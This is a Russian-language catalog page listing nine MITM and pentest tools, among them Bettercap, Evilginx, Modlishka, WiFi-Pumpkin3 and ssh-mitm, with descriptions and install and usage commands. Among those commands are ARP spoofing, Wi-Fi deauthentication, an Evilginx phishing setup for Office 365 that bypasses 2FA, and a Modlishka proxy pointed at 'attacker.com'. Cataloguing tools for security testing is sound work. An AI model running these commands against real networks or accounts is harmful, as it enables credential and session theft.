Каталог инструментов

9 инструментов

Тег: mitm ×

Bettercap

v2.41.7
Network Analysis ★ featured

Швейцарский нож для сетевых атак и разведки. Поддерживает атаки на Wi-Fi, BLE, HID, ARP-спуфинг, MITM с модульной архитектурой и web-интерфейсом. Возможности: - ARP/DNS/mDNS-спуфинг, SSL-стриппинг - Wi-Fi: сканирование, деаутентификация, …

# apt: sudo apt install bettercap # go install: go install github.com/bettercap/bettercap@latest # macOS: brew install bettercap # Примеры: # Запустить с веб-интерфейсом: sudo bettercap -eval "api.rest on; ui on" # ARP-спуфинг + sniffing: sudo bettercap # > net.probe on # > set arp.spoof.targets 192.168.1.5 # > arp.spoof on # > net.sniff on # Wi-Fi деаутентификация: sudo bettercap -iface wlan0 # > wifi.recon on # > wifi.deauth TARGET_MAC

Evilginx

v3.3.0
Exploitation

MITM-фреймворк для фишинга с обходом двухфакторной аутентификации. Перехватывает не только пароли, но и сессионные куки — позволяет войти в аккаунт даже при включённом 2FA. Поддерживает кастомные phishlets для …

# Сборка из исходников (Go 1.18+): git clone https://github.com/kgretzky/evilginx2 cd evilginx2 make # Запуск (требует домен и порты 80/443): sudo ./evilginx > config domain yourdomain.com > config ipv4 1.2.3.4 > phishlets hostname o365 login.yourdomain.com > phishlets enable o365

GATTacker

v0.1.5
Wireless & RF

MITM-прокси для Bluetooth Low Energy GATT-коммуникаций. Клонирует BLE-устройство, подключается к нему от имени легитимного клиента и позволяет перехватывать и модифицировать BLE-трафик в реальном времени. Идеален для атак на …

npm install gattacker # Сканирование и клонирование: node scan.js node advertise.js <device-id> # MITM: node mitm.js

Modlishka

Exploitation

Реверс-прокси для фишинга — проксирует реальные сайты в реальном времени и перехватывает учётные данные и сессионные куки. Поддерживает TLS, кастомные домены и автоматическое внедрение payload-а. Альтернатива Evilginx без …

# Требуется Go 1.14+: git clone https://github.com/drk1wi/Modlishka cd Modlishka go build # Запуск: ./modlishka -proxyDomain attacker.com -target targetsite.com \ -listeningPort 443 -tls true

OsmocomBB

v0.2.0
Wireless & RF

Open-source реализация GSM baseband firmware для телефонов Motorola (C118, C123). Даёт полный контроль над GSM стеком на уровне baseband: активный IMSI-catching, MITM-атаки на GSM, фаззинг протоколов, декодирование трафика …

git clone git://git.osmocom.org/osmocombb cd osmocombb/src/host/osmocon && make # Требуется телефон Motorola C118/C123 + кабель # Загрузка firmware: ./osmocon -p /dev/ttyUSB0 -m c123 \ ../../target/firmware/board/compal_e88/hello_world.highram.bin

WiFi-Pumpkin3

v1.0.0
Wireless & RF

Фреймворк для создания мошеннических точек доступа (Rogue AP): перехват трафика, DNS-спуфинг, phishing captive portal, MITM-плагины. Веб-интерфейс управления. Поддерживает плагины для кражи cookie, учётных данных и анализа трафика.

pip3 install wifi-pumpkin3 # или из исходников: git clone https://github.com/P0cL4bs/WiFi-Pumpkin3 cd WiFi-Pumpkin3 && sudo python setup.py install # Запуск: sudo wifi-pumpkin3

microca

Network Analysis

Минималистичный Certificate Authority на Go для быстрого развёртывания PKI без зависимостей. Генерирует корневой CA, выдаёт серверные и клиентские сертификаты, управляет CRL. В пентесте используется для: создания PKI в …

# go install go install suah.dev/microca@latest # Из исходников git clone https://git.sr.ht/~qbit/microca cd microca go build -o microca . sudo mv microca /usr/local/bin/ # Создать корневой CA microca init # Выдать сертификат для сервера microca sign --host target.local # Выдать клиентский сертификат (mTLS) microca sign --client --cn "pentest-client"

mitmproxy

v12.2.3
Network Analysis

Интерактивный HTTPS-прокси для перехвата, анализа и модификации HTTP/HTTPS/WebSocket трафика. Незаменим для тестирования веб-приложений, анализа мобильных приложений и API. Возможности: - Три режима: mitmproxy (TUI), mitmweb (браузер), mitmdump (CLI) …

# pip: pip install mitmproxy # apt: sudo apt install mitmproxy # macOS: brew install mitmproxy # Запустить TUI-прокси на порту 8080: mitmproxy --listen-port 8080 # Веб-интерфейс: mitmweb --listen-port 8080 # Тихий режим (логировать всё в файл): mitmdump -w traffic.dump # Установить сертификат (после запуска прокси): # Браузер → proxy 127.0.0.1:8080 → mitm.it → Install cert

ssh-mitm

v5.0.0
Network Analysis

SSH MITM-прокси для аудита безопасности SSH-инфраструктуры. Перехватывает SSH-сессии, поддерживает аутентификацию по публичному ключу через agent-forwarding, записывает терминальные сессии и передаваемые файлы (SCP/SFTP). Позволяет выполнять инъекции команд в активную …

# pip pip install ssh-mitm # pipx pipx install ssh-mitm # Из исходников (GitHub — основной репо) git clone https://github.com/ssh-mitm/ssh-mitm cd ssh-mitm pip install -e . # Запуск (перехват подключений к целевому серверу) ssh-mitm server --remote-host target.host --listen-port 10022 # Прозрачный режим (требует CAP_NET_ADMIN) sudo ssh-mitm server --transparent --listen-port 10022